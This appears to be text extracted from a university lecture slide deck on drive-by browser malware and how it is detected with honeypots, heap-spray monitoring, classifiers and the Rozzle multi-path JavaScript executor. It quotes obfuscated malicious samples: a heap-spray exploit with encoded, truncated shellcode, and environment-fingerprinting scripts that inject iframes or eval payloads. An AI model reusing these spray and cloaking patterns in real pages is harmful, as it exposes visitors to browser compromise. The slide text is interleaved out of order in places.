CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, - PowerPoint PPT Presentation

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits

Homework, Labs, and Project 2  Please be ready to give  HW-3 due Friday a short 2-minute pitch  Lab-3 due Tuesday about your strategy  We want to give you  Ask more questions more time to focus on  We are here to help the project  There’s no need to feel  sql3 stuck – we want you to  xss7 spend your time well  Xss8 and learn a lot from the  Are now extra credit process

See Anything in Common var MuqEZYdx = "% u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01…“ ; var avIztsbF = "%u0C0C%u0C0C" ; var TzsygYnD = " %u0b0b %u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"; var eSSOLKOd = unescape(MuqEZYdx ); var pbIkPrKa = new Array (); var wSqaQK = 1000; var xASdnqwj = 0x100000; var xAFKNqwO = 2; var oQkmsLLP = 0x01020; var EibcUrHC = xASdnqwj - (eSSOLKOd.length * xAFKNqwO + oQkmsLLP); var cTAfWBbz = unescape(avIztsbF ); var oKqMlPqL = 0xC0; while (cTAfWBbz.length < EibcUrHC / xAFKNqwO) { cTAfWBbz += cTAfWBbz; } var GBVpRAcd = cTAfWBbz.substring(0, EibcUrHC / xAFKNqwO); delete cTAfWBbz; for (JyxIaABZ = 0; JyxIaABZ < oKqMlPqL; JyxIaABZ++) { pbIkPrKa[JyxIaABZ] = GBVpRAcd + eSSOLKOd; } CollectGarbage(); var fseYOuUZ = unescape(TzsygYnD ); var wxDSxsOR = new Array(); for (var FNMszcqR = 0; FNMszcqR < wSqaQK; FNMszcqR++) wxDSxsOR.push(document.createElement("img")); function FKOASMamskASDweqnbjdwasSDQWWQq() { vVLUmYRf = document.createElement("tbody"); 3 vVLUmYRf.click; var wycLwNIo = vVLUmYRf.cloneNode();

Detecting Drive-By Malware 4  VM-based detection  Done in data centers and user browsers  Static or statistical analysis of code  Generally, pre- scanning of URLs is  Runtime observations preferable  Why?  What are the downsides?

Browser Consume URL Blacklists 5

But Also Search Engines 6

Safe Browsing Diagnostics 7

VM-Based Detection (Honeymonkey) 8  Runtime detection  Why use a VM?  Put a (possibly  What if nothing vulnerable browser) happens? What can into a VM you conclude?  Equip it with some  How would malware plugins hide from you?  Visit a possibly malicious site  See if anything interesting happens

Runtime Detection 9  Focusing on heap sprays – very common in 2008-2012 time frame  Monitor the browser heap looking for evidence of spraying

Statistical Detection 10  Observe patterns in the code  Train Machine Learning classifiers  Combine with de- obfuscation

ROZZLE 11

Online "\x6D"+"\x73\x69\x65 "+"\x20\x36" … an example pulled from our DB… = "msie 6" if (navigator.userAgent.toLowerCase().indexOf( "\x6D"+"\x73\x69\x65"+"\x20\x36")>0) document.write ("<iframe src=x6.htm></iframe>"); if (navigator.userAgent.toLowerCase().indexOf( "\x6D"+"\x73"+"\x69"+"\x65"+"\x20"+"\x37")>0) document.write ("<iframe src=x7.htm></iframe>"); "\x6D"+"\x73"+"\x69"+"\ try { x65"+"\x20"+"\x37" var a; var aa=new ActiveXObject("Sh"+"ockw"+"av"+"e"+"Fl" +[…]); } catch ( a ) { } finally { = if (a!="[object Error]") "msie 7" document.write ("<iframe src=svfl9.htm></iframe>"); } try { var c; var f= new ActiveXObject("O"+"\x57\x43"+"\x31\x30\x2E\x53" +[…]); } catch ( c ) { } finally { "O"+"\x57\x43"+"\x31\x30\x2E\x5 if (c!="[object Error]") { 3"+"pr"+"ea"+"ds"+"he"+"et" aacc = "<iframe src=of.htm></iframe>"; setTimeout ("document.write(aacc)", 3500); = } } "OWC10.Spreadsheet" 12

Environment Fingerprinting Prevents Detection Nozzle Zozzle < script > • In 7.7% of JS files, code gets a var adobe=new ActiveXObject( ‘AcroPDF.PDF’ ); < script > reference to environment var adobeVersion=adobe.GetVariable ( ‘$version’ ); Is this a practical problem for if (navigator.userAgent.indexOf( ‘IE 6’ )>=0) if (navigator.userAgent.indexOf( ‘IE 6’ )>=0 && • { In 1.2%, code branches on our malware detectors? adobeVersion == ’9.1.3’ ) var x=unescape( ‘%u4149%u1982%u90 […]’ ); such sensitive values { eval(x); var x=unescape( ‘%u4149%u1982%u90 […]’ ); • 89.5% of malicious JS branches } eval(x); < /script > on such values } < /script > 13

Typical Malware Cloaking 14

More Complex Fingerprinting Fingerprint: Q0193807F127J14 15

Avoiding Dynamic Crawlers 16

Avoiding Static Detection 17

How to Allocate Detection Resources? Rozzle 1.4 1.5 2.0 … 9.0 9.1 … How many resources 10.0 Clearly does not scale should be allocated to What if the site simply is 8 filter malicious sites? not malicious? 9 10 18

Rozzle Multi-path execution framework for JavaScript What it is/does What it is not • • Multiple browser profiles Cluster of machines: too on single machine resource consuming • • Symbolic execution: re- Branch on environment- sensitive checks verting to a previous state • No forking similar to running multiple • No snapshotting browsers in parallel • Execute individual branches • Static analysis: Retain much sequentially to increase of runtime precision coverage 19

Multi-Execution in Rozzle < script > var adobe=new ActiveXObject( ‘AcroPDF.PDF’ ); var adobeVersion=adobe.GetVariable ( ‘$version’ ); if (navigator.userAgent.indexOf( ‘IE 7’ )>=0 && adobeVersion == ’9.1.3’ ) { var x=unescape( ‘%u4149%u1982%u90 […]’ ); eval(x); } else if (adobeVersion == ’8.0.1’ ) { var x=unescape( ‘% u4073%u8279%u77 […]’ ); eval(x); } … < /script > 20

Experiments Offline • Controlled Experiment • 7x more Nozzle detections • Online Similar to Bing crawling • Almost 4x more Nozzle detections • 10.1% more Zozzle detections Overhead • 1.1% runtime overhead • 1.4% memory overhead 21